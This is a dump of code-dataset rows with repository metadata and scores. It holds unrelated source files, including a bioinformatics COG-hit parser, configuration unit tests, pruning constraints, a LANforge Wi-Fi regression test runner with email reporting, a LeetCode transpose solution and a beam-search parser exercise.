max_stars_repo_path
stringlengths 3
269
| max_stars_repo_name
stringlengths 4
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.05M
| score
float64 0.23
5.13
| int_score
int64 0
5
|
|---|---|---|---|---|---|---|
libs/python_scripts/MetaPathways_MLTreeMap_hits.py
|
ariahahn/MetaPathways_Python.3.0
| 0
|
12784751
|
#!/usr/bin/python
# File created on 27 Jan 2012.
from __future__ import division
__author__ = "<NAME>"
__copyright__ = "Copyright 2013, MetaPathways"
__credits__ = ["r"]
__version__ = "1.0"
__maintainer__ = "<NAME>"
__status__ = "Release"
try:
import os
import re
from os import makedirs, sys, remove, listdir
from sys import path
from optparse import OptionParser
from libs.python_modules.utils.metapathways_utils import parse_command_line_parameters, fprintf
from libs.python_modules.utils.sysutil import getstatusoutput
except:
print """ Could not load some user defined module functions"""
print """ Make sure your typed \"source MetaPathwaysrc\""""
print """ """
sys.exit(3)
usage= """./MetaPathway_MLTreeMap_hits.py -i input_folder -o output_file """
parser = OptionParser(usage)
parser.add_option("-i", "--input-folder", dest="input_folder",
help='the input mltreemap output folder [REQUIRED]')
parser.add_option("-o", "--output-file", dest="output_file",
help='the output file for COG hits [REQUIRED]')
def check_arguments(opts, args):
if opts.input_folder == None or opts.output_file == None:
return True
else:
return False
def main(argv):
(opts, args) = parser.parse_args()
if check_arguments(opts, args):
print usage
sys.exit(0)
input_folder = opts.input_folder
output_file = opts.output_file
filePATTERN = re.compile(r'.*COG[0-9]*.*\.fa');
cogSeqMatchesPATTERN = re.compile(r'[a-zA-Z]*_(.*)__[0-9]*__*(COG[0-9]*).*.fa');
list= []
for file in listdir(input_folder):
if filePATTERN.match(file):
hits = cogSeqMatchesPATTERN.search( file)
if hits:
list.append( (hits.group(1), hits.group(2)) )
try:
outputfile = open(output_file, 'w')
except:
print "Cannot open file to MLTreeMap hits"
sys.exit(0)
fprintf(outputfile, "Sequences\tCOG\n")
for seq, cog in list:
fprintf(outputfile, "%s\t%s\n",seq, cog)
outputfile.close()
# the main function of metapaths
if __name__ == "__main__":
main(sys.argv[1:])
| 2.453125
| 2
|
common/tests/test_configuration.py
|
vaginessa/irma
| 0
|
12784752
|
#
# Copyright (c) 2013-2018 Quarkslab.
# This file is part of IRMA project.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License in the top-level directory
# of this distribution and at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# No part of the project, including this file, may be copied,
# modified, propagated, or distributed except according to the
# terms contained in the LICENSE file.
import logging
import unittest
import os
import copy
from irma.configuration.config import ConfigurationSection
from irma.configuration.ini import IniConfiguration, TemplatedConfiguration
from irma.common.exceptions import IrmaConfigurationError
# =================
# Logging options
# =================
def enable_logging(level=logging.INFO, handler=None, formatter=None):
log = logging.getLogger()
if formatter is None:
formatter = logging.Formatter("%(asctime)s [%(name)s] " +
"%(levelname)s: %(message)s")
if handler is None:
handler = logging.StreamHandler()
handler.setFormatter(formatter)
log.addHandler(handler)
log.setLevel(level)
# ============
# Test Cases
# ============
class TestIniConfiguration(unittest.TestCase):
def test_ini_config_value(self):
directory = os.path.dirname(os.path.realpath(__file__))
config = IniConfiguration("{0}/test.ini".format(directory))
self.assertEqual(config["foo"].bar, "foobar")
self.assertEqual(config["foo bar"].foo, "foo")
self.assertEqual(config["foo bar"].bar, "bar")
def test_ini_config_types(self):
directory = os.path.dirname(os.path.realpath(__file__))
config = IniConfiguration("{0}/test.ini".format(directory))
self.assertEqual(isinstance(config, IniConfiguration),
True)
self.assertEqual(isinstance(config["foo bar"], ConfigurationSection),
True)
self.assertEqual(isinstance(config["foo bar"].bar, str),
True)
template = {'foo':
[('bar', TemplatedConfiguration.string, None)],
'foo bar':
[('foo', TemplatedConfiguration.string, None),
('bar', TemplatedConfiguration.string, None),
('val', TemplatedConfiguration.integer, 1337)],
'bar':
[('foo1', TemplatedConfiguration.integer, 42),
('foo2', TemplatedConfiguration.string, "Answer"),
('foo3', TemplatedConfiguration.boolean, None),
('foo4', TemplatedConfiguration.boolean, False)
]
}
class TestTemplatedConfiguration(unittest.TestCase):
def test_templated_config_value(self):
directory = os.path.dirname(os.path.realpath(__file__))
template_path = "{0}/test.ini".format(directory)
config = TemplatedConfiguration(template_path, template)
self.assertTrue(isinstance(config, TemplatedConfiguration))
self.assertEqual(config["foo"].bar, "foobar")
self.assertEqual(config["foo bar"].foo, "foo")
self.assertEqual(config["foo bar"].bar, "bar")
self.assertEqual(config["bar"].foo1, 65)
self.assertTrue(config["bar"].foo3)
def test_templated_config_default_value(self):
directory = os.path.dirname(os.path.realpath(__file__))
template_path = "{0}/test.ini".format(directory)
config = TemplatedConfiguration(template_path, template)
self.assertEqual(config["foo bar"].val, 1337)
self.assertEqual(config["bar"].foo2, "Answer")
self.assertFalse(config["bar"].foo4)
def test_templated_config_missing_value(self):
directory = os.path.dirname(os.path.realpath(__file__))
template1 = copy.copy(template)
template1['missingsection'] = [
('missingkey', TemplatedConfiguration.string, None)]
with self.assertRaises(IrmaConfigurationError):
TemplatedConfiguration("{0}/test.ini".format(directory), template1)
def test_templated_config_section_only_default_value(self):
directory = os.path.dirname(os.path.realpath(__file__))
template1 = copy.copy(template)
template1['missingsection'] = [
('missingkey', TemplatedConfiguration.string, "with_def_value")]
config = TemplatedConfiguration("{0}/test.ini".format(directory),
template1)
self.assertTrue(isinstance(config["missingsection"],
ConfigurationSection))
self.assertEqual(config["missingsection"].missingkey,
"with_def_value")
def test_templated_config_value_with_space(self):
directory = os.path.dirname(os.path.realpath(__file__))
template1 = copy.copy(template)
template1['missingsection'] = [
('one missing key',
TemplatedConfiguration.string,
"with_def_value")]
config = TemplatedConfiguration("{0}/test.ini".format(directory),
template1)
self.assertTrue(isinstance(config["missingsection"],
ConfigurationSection))
self.assertEqual(config["missingsection"]["one missing key"],
"with_def_value")
def test_templated_config_wrong_template_tuple_instead_of_list(self):
directory = os.path.dirname(os.path.realpath(__file__))
template1 = copy.copy(template)
template1['missingsection'] = (('key',
TemplatedConfiguration.string,
None))
with self.assertRaises(IrmaConfigurationError):
TemplatedConfiguration("{0}/test.ini".format(directory), template1)
def test_templated_config_wrong_value(self):
directory = os.path.dirname(os.path.realpath(__file__))
template_path = "{0}/test.ini".format(directory)
template1 = copy.copy(template)
template1['WrongVal'] = [('an_int',
TemplatedConfiguration.integer,
None)]
with self.assertRaises(IrmaConfigurationError):
TemplatedConfiguration(template_path, template1)
if __name__ == '__main__':
enable_logging()
unittest.main()
| 2.046875
| 2
|
a.py
|
JuYeong98/st-gcn
| 2
|
12784753
|
<filename>a.py
import os
print("before: %s"%os.getcwd())
os.chdir("/work_dir")
print("after: %s"%os.getcwd())
| 2.65625
| 3
|
torchopt/optim/constraint.py
|
r-papso/torch-accelerator
| 0
|
12784754
|
<reponame>r-papso/torch-accelerator
from abc import ABC, abstractmethod
from typing import Any
from torch import nn
from ..prune.pruner import Pruner
from .cache import Cache
class Constraint(ABC):
"""Abstract class representing a constraint in optimization problems."""
def __init__(self) -> None:
"""Ctor."""
super().__init__()
@abstractmethod
def feasible(self, solution: Any) -> bool:
"""Determines if solution produced by optimization algorithm satisfies given constraint.
Args:
solution (Any): Solution produced by optimization algorithm to be evaluated.
Returns:
bool: True if solution satisfies given constraint, False otherwise.
"""
pass
class ConstraintContainer(Constraint):
"""Represents a container for modelling optimization problems with multiple conditions.
Constraint represented by ConstraintContainer is considered feasible (i. e. function feasible
returns True) if and only if all of the constraints within the container are satisfied.
"""
def __init__(self, *constraints: Constraint) -> None:
"""Ctor.
Args:
constraints (Constraint): List of constraints to be added to the container.
"""
super().__init__()
self._constrs = constraints
def feasible(self, solution: Any) -> bool:
return all(constr.feasible(solution) for constr in self._constrs)
class ChannelConstraint(Constraint):
"""Constrain for checking a validity of pruning mask.
Constraint checks if solution, which represents pruning mask, will produce valid pruned
model (neural network). Pruned model is invalid if any of it's weight tensors are fully
pruned, i. e. weight tensor's first dimension is less than 1.
"""
def __init__(self, model: nn.Module, pruner: Pruner) -> None:
"""Ctor.
Args:
model (nn.Module): Model to be pruned.
pruner (Pruner): Pruner used for pruning the model.
"""
super().__init__()
self._pruner = pruner
self._model = model
def feasible(self, solution: Any) -> bool:
model = Cache.get_pruned_model(self._model, self._pruner, solution)
for module in model.modules():
weight = getattr(module, "weight", None)
if weight is not None and any(dim <= 0 for dim in weight.shape):
return False
return True
| 3.078125
| 3
|
py-scripts/scripts_deprecated/lf_check_jbr.py
|
alexman69420/lanforge-scripts
| 11
|
12784755
|
#!/usr/bin/python3
'''
NAME:
lf_check.py
PURPOSE:
lf_check.py will run a series of tests based on the test TEST_DICTIONARY listed in lf_check_config.ini.
The lf_check_config.ini file is copied from lf_check_config_template.ini and local configuration is made
to the lf_check_config.ini.
EXAMPLE:
lf_check.py
NOTES:
Before using lf_check.py
1. copy lf_check_config_template.ini to the lf_check_config.ini
2. update lf_check_config.ini to enable (TRUE) tests to be run in the TEST_DICTIONARY , the TEST_DICTIONARY needs to be passed in
'''
import datetime
import pprint
import sys
if sys.version_info[0] != 3:
print("This script requires Python3")
exit()
import os
import socket
import logging
import time
from time import sleep
import argparse
import json
import configparser
import subprocess
import csv
import shutil
import os.path
# lf_report is from the parent of the current file
dir_path = os.path.dirname(os.path.realpath(__file__))
parent_dir_path = os.path.abspath(os.path.join(dir_path,os.pardir))
sys.path.insert(0, parent_dir_path)
#sys.path.append('../')
from lf_report import lf_report
sys.path.append('/')
CONFIG_FILE = os.getcwd() + '/lf_check_config.ini'
RUN_CONDITION = 'ENABLE'
# setup logging FORMAT
FORMAT = '%(asctime)s %(name)s %(levelname)s: %(message)s'
# lf_check class contains verificaiton configuration and ocastrates the testing.
class lf_check():
def __init__(self,
_csv_results,
_outfile):
self.lf_mgr_ip = ""
self.lf_mgr_port = ""
self.radio_dict = {}
self.test_dict = {}
path_parent = os.path.dirname(os.getcwd())
os.chdir(path_parent)
self.scripts_wd = os.getcwd()
self.results = ""
self.outfile = _outfile
self.test_result = "Failure"
self.results_col_titles = ["Test","Command","Result","STDOUT","STDERR"]
self.html_results = ""
self.background_green = "background-color:green"
self.background_red = "background-color:red"
self.background_purple = "background-color:purple"
self.http_test_ip = ""
self.ftp_test_ip = ""
self.test_ip = ""
# section TEST_GENERIC
self.radio_lf = ""
self.ssdi = ""
self.ssid_pw = ""
self.security = ""
self.num_sta = ""
self.col_names = ""
self.upstream_port = ""
self.csv_results = _csv_results
self.csv_results_file = ""
self.csv_results_writer = ""
self.csv_results_column_headers = ""
self.logger = logging.getLogger(__name__)
self.test_timeout = 120
self.use_blank_db = "FALSE"
self.use_factory_default_db = "FALSE"
self.use_custom_db = "FALSE"
self.production_run = "FALSE"
self.email_list_production = ""
self.host_ip_production = None
self.email_list_test = ""
self.host_ip_test = None
# NOT complete : will send the email results
def send_results_email(self, report_file=None):
if (report_file is None):
print( "No report file, not sending email.")
return
report_url=report_file.replace('/home/lanforge/', '')
if report_url.startswith('/'):
report_url = report_url[1:]
# Following recommendation
# NOTE: https://stackoverflow.com/questions/24196932/how-can-i-get-the-ip-address-from-nic-in-python
#command = 'echo "$HOSTNAME mail system works!" | mail -s "Test: $HOSTNAME $(date)" chuck.re<EMAIL>'
hostname = socket.gethostname()
ip = socket.gethostbyname(hostname)
message_txt = """Results from {hostname}:\\n
http://{ip}/{report}\\n
NOTE: for now to see stdout and stderr remove /home/lanforge from path.\\n
""".format(hostname=hostname, ip=ip, report=report_url)
mail_subject = "Regression Test [{hostname}] {date}".format(hostname=hostname,
date=datetime.datetime.now())
try:
if self.production_run == "TRUE":
msg = message_txt.format(ip=self.host_ip_production)
command = "echo \"{message}\" | mail -s \"{subject}\" {address}".format(
message=msg,
subject=mail_subject,
ip=self.host_ip_production,
address=self.email_list_production)
else:
msg = message_txt.format(ip=ip)
command = "echo \"{message}\" | mail -s \"{subject}\" {address}".format(
message=msg,
subject=mail_subject,
ip=ip, #self.host_ip_test,
address=self.email_list_test)
print("running:[{}]".format(command))
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
# have email on separate timeout
process.wait(timeout=int(self.test_timeout))
except subprocess.TimeoutExpired:
print("send email timed out")
process.terminate()
def get_csv_results(self):
return self.csv_file.name
def start_csv_results(self):
print("self.csv_results")
self.csv_results_file = open(self.csv_results, "w")
self.csv_results_writer = csv.writer(self.csv_results_file, delimiter=",")
self.csv_results_column_headers = ['Test','Command','Result','STDOUT','STDERR']
self.csv_results_writer.writerow(self.csv_results_column_headers)
self.csv_results_file.flush()
def get_html_results(self):
return self.html_results
def start_html_results(self):
self.html_results += """
<table border="1" class="dataframe">
<thead>
<tr style="text-align: left;">
<th>Test</th>
<th>Command</th>
<th>Result</th>
<th>STDOUT</th>
<th>STDERR</th>
</tr>
</thead>
<tbody>
"""
def finish_html_results(self):
self.html_results += """
</tbody>
</table>
<br>
<br>
<br>
"""
# Functions in this section are/can be overridden by descendants
# This code reads the lf_check_config.ini file to populate the test variables
def read_config_contents(self):
self.logger.info("read_config_contents {}".format(CONFIG_FILE))
config_file = configparser.ConfigParser()
success = True
success = config_file.read(CONFIG_FILE)
self.logger.info("logger worked")
if 'LF_MGR' in config_file.sections():
section = config_file['LF_MGR']
self.lf_mgr_ip = section['LF_MGR_IP']
self.lf_mgr_port = section['LF_MGR_PORT']
self.logger.info("lf_mgr_ip {}".format(self.lf_mgr_ip))
self.logger.info("lf_mgr_port {}".format(self.lf_mgr_port))
if 'TEST_NETWORK' in config_file.sections():
section = config_file['TEST_NETWORK']
self.http_test_ip = section['HTTP_TEST_IP']
self.logger.info("http_test_ip {}".format(self.http_test_ip))
self.ftp_test_ip = section['FTP_TEST_IP']
self.logger.info("ftp_test_ip {}".format(self.ftp_test_ip))
self.test_ip = section['TEST_IP']
self.logger.info("test_ip {}".format(self.test_ip))
if 'TEST_GENERIC' in config_file.sections():
section = config_file['TEST_GENERIC']
self.radio_lf = section['RADIO_USED']
self.logger.info("radio_lf {}".format(self.radio_lf))
self.ssid = section['SSID_USED']
self.logger.info("ssid {}".format(self.ssid))
self.ssid_pw = section['SSID_PW_USED']
self.logger.info("ssid_pw {}".format(self.ssid_pw))
self.security = section['SECURITY_USED']
self.logger.info("secruity {}".format(self.security))
self.num_sta = section['NUM_STA']
self.logger.info("num_sta {}".format(self.num_sta))
self.col_names = section['COL_NAMES']
self.logger.info("col_names {}".format(self.col_names))
self.upstream_port = section['UPSTREAM_PORT']
self.logger.info("upstream_port {}".format(self.upstream_port))
if 'TEST_PARAMETERS' in config_file.sections():
section = config_file['TEST_PARAMETERS']
self.test_timeout = section['TEST_TIMEOUT']
self.use_blank_db = section['LOAD_BLANK_DB']
self.use_factory_default_db = section['LOAD_FACTORY_DEFAULT_DB']
self.use_custom_db = section['LOAD_CUSTOM_DB']
self.custom_db = section['CUSTOM_DB']
self.production_run = section['PRODUCTION_RUN']
self.email_list_production = section['EMAIL_LIST_PRODUCTION']
self.host_ip_production = section['HOST_IP_PRODUCTION']
self.email_list_test = section['EMAIL_LIST_TEST']
self.host_ip_test = section['HOST_IP_TEST']
if 'RADIO_DICTIONARY' in config_file.sections():
section = config_file['RADIO_DICTIONARY']
self.radio_dict = json.loads(section.get('RADIO_DICT', self.radio_dict))
self.logger.info("self.radio_dict {}".format(self.radio_dict))
if 'TEST_DICTIONARY' in config_file.sections():
section = config_file['TEST_DICTIONARY']
# for json replace the \n and \r they are invalid json characters, allows for multiple line args
try:
self.test_dict = json.loads(section.get('TEST_DICT', self.test_dict).replace('\n',' ').replace('\r',' '))
self.logger.info("TEST_DICTIONARY: {}".format(self.test_dict))
except:
self.logger.info("Excpetion loading TEST_DICTIONARY, is there comma after the last entry? Check syntax")
def load_factory_default_db(self):
#self.logger.info("file_wd {}".format(self.scripts_wd))
try:
os.chdir(self.scripts_wd)
#self.logger.info("Current Working Directory {}".format(os.getcwd()))
except:
self.logger.info("failed to change to {}".format(self.scripts_wd))
# no spaces after FACTORY_DFLT
command = "./{} {}".format("scenario.py", "--load FACTORY_DFLT")
process = subprocess.Popen((command).split(' '), shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
# wait for the process to terminate
out, err = process.communicate()
errcode = process.returncode
# Not currently used
def load_blank_db(self):
#self.logger.info("file_wd {}".format(self.scripts_wd))
try:
os.chdir(self.scripts_wd)
#self.logger.info("Current Working Directory {}".format(os.getcwd()))
except:
self.logger.info("failed to change to {}".format(self.scripts_wd))
# no spaces after FACTORY_DFLT
command = "./{} {}".format("scenario.py", "--load BLANK")
process = subprocess.Popen((command).split(' '), shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
def load_custom_db(self,custom_db):
#self.logger.info("file_wd {}".format(self.scripts_wd))
try:
os.chdir(self.scripts_wd)
#self.logger.info("Current Working Directory {}".format(os.getcwd()))
except:
self.logger.info("failed to change to {}".format(self.scripts_wd))
# no spaces after FACTORY_DFLT
command = "./{} {}".format("scenario.py", "--load {}".format(custom_db))
process = subprocess.Popen((command).split(' '), shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
# wait for the process to terminate
out, err = process.communicate()
errcode = process.returncode
def run_script_test(self):
self.start_html_results()
self.start_csv_results()
for test in self.test_dict:
if self.test_dict[test]['enabled'] == "FALSE":
self.logger.info("test: {} skipped".format(test))
# load the default database
elif self.test_dict[test]['enabled'] == "TRUE":
# Make the command replace ment a separate method call.
# loop through radios
for radio in self.radio_dict:
# Replace RADIO, SSID, PASSWD, SECURITY with actual config values (e.g. RADIO_0_CFG to values)
# not "KEY" is just a word to refer to the RADIO define (e.g. RADIO_0_CFG) to get the vlaues
# --num_stations needs to be int not string (no double quotes)
if self.radio_dict[radio]["KEY"] in self.test_dict[test]['args']:
self.test_dict[test]['args'] = self.test_dict[test]['args'].replace(self.radio_dict[radio]["KEY"],'--radio {} --ssid {} --passwd {} --security {} --num_stations {}'
.format(self.radio_dict[radio]['RADIO'],self.radio_dict[radio]['SSID'],self.radio_dict[radio]['PASSWD'],self.radio_dict[radio]['SECURITY'],self.radio_dict[radio]['STATIONS']))
if 'HTTP_TEST_IP' in self.test_dict[test]['args']:
self.test_dict[test]['args'] = self.test_dict[test]['args'].replace('HTTP_TEST_IP',self.http_test_ip)
if 'FTP_TEST_IP' in self.test_dict[test]['args']:
self.test_dict[test]['args'] = self.test_dict[test]['args'].replace('FTP_TEST_IP',self.ftp_test_ip)
if 'TEST_IP' in self.test_dict[test]['args']:
self.test_dict[test]['args'] = self.test_dict[test]['args'].replace('TEST_IP',self.test_ip)
if 'RADIO_USED' in self.test_dict[test]['args']:
self.test_dict[test]['args'] = self.test_dict[test]['args'].replace('RADIO_USED',self.radio_lf)
if 'SSID_USED' in self.test_dict[test]['args']:
self.test_dict[test]['args'] = self.test_dict[test]['args'].replace('SSID_USED',self.ssid)
if 'SSID_PW_USED' in self.test_dict[test]['args']:
self.test_dict[test]['args'] = self.test_dict[test]['args'].replace('SSID_PW_USED',self.ssid_pw)
if 'SECURITY_USED' in self.test_dict[test]['args']:
self.test_dict[test]['args'] = self.test_dict[test]['args'].replace('SECURITY_USED',self.security)
if 'NUM_STA' in self.test_dict[test]['args']:
self.test_dict[test]['args'] = self.test_dict[test]['args'].replace('NUM_STA',self.num_sta)
if 'COL_NAMES' in self.test_dict[test]['args']:
self.test_dict[test]['args'] = self.test_dict[test]['args'].replace('COL_NAMES',self.col_names)
if 'UPSTREAM_PORT' in self.test_dict[test]['args']:
self.test_dict[test]['args'] = self.test_dict[test]['args'].replace('UPSTREAM_PORT',self.col_names)
if self.use_factory_default_db == "TRUE":
self.load_factory_default_db()
sleep(3)
self.logger.info("FACTORY_DFLT loaded between tests with scenario.py --load FACTORY_DFLT")
if self.use_blank_db == "TRUE":
self.load_blank_db()
sleep(1)
self.logger.info("BLANK loaded between tests with scenario.py --load BLANK")
if self.use_custom_db == "TRUE":
try:
self.load_custom_db(self.custom_db)
sleep(1)
self.logger.info("{} loaded between tests with scenario.py --load {}".format(self.custom_db,self.custom_db))
except:
self.logger.info("custom database failed to load check existance and location")
else:
self.logger.info("no db loaded between tests: {}".format(self.use_custom_db))
sleep(1) # the sleep is to allow for the database to stablize
try:
os.chdir(self.scripts_wd)
#self.logger.info("Current Working Directory {}".format(os.getcwd()))
except:
self.logger.info("failed to change to {}".format(self.scripts_wd))
cmd_args = "{}".format(self.test_dict[test]['args'])
command = "./{} {}".format(self.test_dict[test]['command'], cmd_args)
self.logger.info("command: {}".format(command))
self.logger.info("cmd_args {}".format(cmd_args))
if self.outfile is not None:
stdout_log_txt = self.outfile
stdout_log_txt = stdout_log_txt + "-{}-stdout.txt".format(test)
#self.logger.info("stdout_log_txt: {}".format(stdout_log_txt))
stdout_log = open(stdout_log_txt, 'a')
stderr_log_txt = self.outfile
stderr_log_txt = stderr_log_txt + "-{}-stderr.txt".format(test)
#self.logger.info("stderr_log_txt: {}".format(stderr_log_txt))
stderr_log = open(stderr_log_txt, 'a')
print("running {}".format(command))
process = subprocess.Popen((command).split(' '), shell=False, stdout=stdout_log, stderr=stderr_log, universal_newlines=True)
try:
#out, err = process.communicate()
process.wait(timeout=int(self.test_timeout))
except subprocess.TimeoutExpired:
process.terminate()
self.test_result = "TIMEOUT"
#if err:
# self.logger.info("command Test timed out: {}".format(command))
#self.logger.info(stderr_log_txt)
if(self.test_result != "TIMEOUT"):
stderr_log_size = os.path.getsize(stderr_log_txt)
if stderr_log_size > 0 :
self.logger.info("File: {} is not empty: {}".format(stderr_log_txt,str(stderr_log_size)))
self.test_result = "Failure"
background = self.background_red
else:
self.logger.info("File: {} is empty: {}".format(stderr_log_txt,str(stderr_log_size)))
self.test_result = "Success"
background = self.background_green
else:
self.logger.info("TIMEOUT FAILURE, Check LANforge Radios")
self.test_result = "Time Out"
background = self.background_purple
self.html_results += """
<tr><td>""" + str(test) + """</td><td class='scriptdetails'>""" + str(command) + """</td>
<td style="""+ str(background) + """>""" + str(self.test_result) + """
<td><a href=""" + str(stdout_log_txt) + """ target=\"_blank\">STDOUT</a></td>"""
if self.test_result == "Failure":
self.html_results += """<td><a href=""" + str(stderr_log_txt) + """ target=\"_blank\">STDERR</a></td>"""
elif self.test_result == "Time Out":
self.html_results += """<td><a href=""" + str(stderr_log_txt) + """ target=\"_blank\">STDERR</a></td>"""
#self.html_results += """<td></td>"""
else:
self.html_results += """<td></td>"""
self.html_results += """</tr>"""
row = [test,command,self.test_result,stdout_log_txt,stderr_log_txt]
self.csv_results_writer.writerow(row)
self.csv_results_file.flush()
#self.logger.info("row: {}".format(row))
self.logger.info("test: {} executed".format(test))
else:
self.logger.info("enable value {} invalid for test: {}, test skipped".format(self.test_dict[test]['enabled'],test))
self.finish_html_results()
def main():
# arguments
parser = argparse.ArgumentParser(
prog='lf_check.py',
formatter_class=argparse.RawTextHelpFormatter,
epilog='''\
lf_check.py : for running scripts listed in lf_check_config.ini file
''',
description='''\
lf_check.py
-----------
Summary :
---------
for running scripts listed in lf_check_config.ini
''')
parser.add_argument('--outfile', help="--outfile <Output Generic Name> used as base name for all files generated", default="")
parser.add_argument('--logfile', help="--logfile <logfile Name> logging for output of lf_check.py script", default="lf_check.log")
args = parser.parse_args()
# output report.
report = lf_report(_results_dir_name="lf_check",
_output_html="lf_check.html",
_output_pdf="lf-check.pdf")
current_time = time.strftime("%Y-%m-%d-%H-%M-%S", time.localtime())
csv_results = "lf_check{}-{}.csv".format(args.outfile,current_time)
csv_results = report.file_add_path(csv_results)
outfile = "lf_check-{}-{}".format(args.outfile,current_time)
outfile_path = report.file_add_path(outfile)
# lf_check() class created
check = lf_check(_csv_results = csv_results,
_outfile = outfile_path)
# get the git sha
process = subprocess.Popen(["git", "rev-parse", "HEAD"], stdout=subprocess.PIPE)
(commit_hash, err) = process.communicate()
exit_code = process.wait()
git_sha = commit_hash.decode('utf-8','ignore')
# set up logging
logfile = args.logfile[:-4]
print("logfile: {}".format(logfile))
logfile = "{}-{}.log".format(logfile,current_time)
logfile = report.file_add_path(logfile)
print("logfile {}".format(logfile))
formatter = logging.Formatter(FORMAT)
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
file_handler = logging.FileHandler(logfile, "w")
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
logger.addHandler(logging.StreamHandler(sys.stdout)) # allows to logging to file and stdout
logger.info("commit_hash: {}".format(commit_hash))
logger.info("commit_hash2: {}".format(commit_hash.decode('utf-8','ignore')))
check.read_config_contents() # CMR need mode to just print out the test config and not run
check.run_script_test()
# Generate Ouptput reports
report.set_title("LF Check: lf_check.py")
report.build_banner()
report.start_content_div()
report.set_table_title("LF Check Test Results")
report.build_table_title()
report.set_text("git sha: {}".format(git_sha))
report.build_text()
html_results = check.get_html_results()
report.set_custom_html(html_results)
report.build_custom()
html_report = report.write_html_with_timestamp()
print("html report: {}".format(html_report))
report.write_pdf_with_timestamp()
report_path = os.path.dirname(html_report)
parent_report_dir = os.path.dirname(report_path)
# copy results to lastest so someone may see the latest.
lf_check_latest_html = parent_report_dir + "/lf_check_latest.html"
# duplicates html_report file up one directory
lf_check_html_report = parent_report_dir + "/{}.html".format(outfile)
#
banner_src_png = report_path + "/banner.png"
banner_dest_png = parent_report_dir + "/banner.png"
CandelaLogo_src_png = report_path + "/CandelaLogo2-90dpi-200x90-trans.png"
CandelaLogo_dest_png = parent_report_dir + "/CandelaLogo2-90dpi-200x90-trans.png"
report_src_css = report_path + "/report.css"
report_dest_css = parent_report_dir + "/report.css"
custom_src_css = report_path + "/custom.css"
custom_dest_css = parent_report_dir + "/custom.css"
font_src_woff = report_path + "/CenturyGothic.woff"
font_dest_woff = parent_report_dir + "/CenturyGothic.woff"
#pprint.pprint([
# ('banner_src', banner_src_png),
# ('banner_dest', banner_dest_png),
# ('CandelaLogo_src_png', CandelaLogo_src_png),
# ('CandelaLogo_dest_png', CandelaLogo_dest_png),
# ('report_src_css', report_src_css),
# ('custom_src_css', custom_src_css)
#])
# copy one directory above
shutil.copyfile(html_report, lf_check_latest_html)
shutil.copyfile(html_report, lf_check_html_report)
# copy banner and logo
shutil.copyfile(banner_src_png, banner_dest_png)
shutil.copyfile(CandelaLogo_src_png, CandelaLogo_dest_png)
shutil.copyfile(report_src_css, report_dest_css)
shutil.copyfile(custom_src_css, custom_dest_css)
shutil.copyfile(font_src_woff, font_dest_woff)
print("lf_check_latest.html: "+lf_check_latest_html)
print("lf_check_html_report: "+lf_check_html_report)
check.send_results_email(report_file=lf_check_html_report)
if __name__ == '__main__':
main()
| 2.390625
| 2
|
python/867.transpose-matrix.py
|
fengbaoheng/leetcode
| 1
|
12784756
|
#
# @lc app=leetcode.cn id=867 lang=python3
#
# [867] 转置矩阵
#
from typing import List
class Solution:
def transpose(self, A: List[List[int]]) -> List[List[int]]:
if A is None:
return []
rows = len(A)
if rows == 0:
return []
cols = len(A[0])
if cols == 0:
return []
B = []
for c in range(cols):
B.append([A[r][c] for r in range(rows)])
return B
| 3.484375
| 3
|
CS6900/Assignment05/tdbptay.py
|
aashishyadavally/MS_AI_Coursework
| 0
|
12784757
|
"""
Name: <NAME>
"""
import heapq
g4 = [('S',['a','S','S']),
('S',[])]
def tdpstep(g, input_categories_parses): # compute all possible next steps from (ws,cs)
global n_steps
(ws,cs,p) = input_categories_parses
if len(cs)>0:
cs1=cs[1:] # copy of predicted categories except cs[0]
p1 = p[:] # copy of rules used so far
nextsteps=[]
for (lhs,rhs) in g:
if lhs == cs[0]:
n_steps += 1
print('expand',lhs,'->',rhs) # for trace
nextsteps.append((ws,rhs+cs1,p1+[[lhs]+rhs]))
if len(ws)>0 and ws[0] == cs[0]:
n_steps += 1
print('scan',ws[0]) # for trace
ws1=ws[1:]
nextsteps.append((ws1,cs1,p1))
return nextsteps
else:
return []
def derive(g,beam,k):
while beam != [] and not (min(beam)[1] == [] and min(beam)[2] == []):
(prob0,ws0,cs0,p0) = heapq.heappop(beam)
nextsteps = tdpstep(g,(ws0,cs0,p0))
print('nextsteps=',nextsteps)
if len(nextsteps) > 0:
prob1 = prob0/float(len(nextsteps))
if -(prob1) > k:
for (ws1,cs1,p1) in nextsteps:
heapq.heappush(beam,(prob1,ws1,cs1,p1))
print ('pushed',(prob1,ws1,cs1)) # for trace
print('|beam|=',len(beam)) # for trace
def parse(g,ws,k):
global n_steps
n_steps = 0
beam = [(-1.,ws,['S'],[])]
heapq.heapify(beam) # make list of derivations into a "min-heap"
while beam != []:
derive(g,beam,k)
if beam == []:
return 'False'
else:
d=heapq.heappop(beam)
print('ll=', d[3])
print('Number of steps are: ' + str(n_steps))
# ans = input('another? ')
# if len(ans)>0 and ans[0]=='n':
# return d[3]
# parse(g4, list('a'), 0.0001)
# parse(g4, list('aa'), 0.0001)
# parse(g4, list('aaa'), 0.0001)
# parse(g4, list('aaaa'), 0.0001)
# parse(g4, list('aaaaa'), 0.0001)
# parse(g4, list('aaaaaa'), 0.0001)
# parse(g4, list('aaaaaaa'), 0.0000001)
############################################################################################
# 3. Number of steps to parse 'a': 7
# Number of steps to parse 'aa': 19
# Number of steps to parse 'aaa': 52
# Number of steps to parse 'aaaa': 150
# Number of steps to parse 'aaaaa': 456
# Number of steps to parse 'aaaaaa': 1446
# Number of steps to parse 'aaaaaaa': 4735
#
# 4. For all values of 'n' greater than or equal to 1, the number of steps required
# to find all parses of the sentence exceed 2^n.
#
#
| 2.8125
| 3
|
functions.py
|
justinhohner/python_basics
| 0
|
12784758
|
#!/usr/local/bin/python3
# https://www.tutorialsteacher.com/python/python-user-defined-function
"""
functions are an abstraction that make code easier to read and follow.
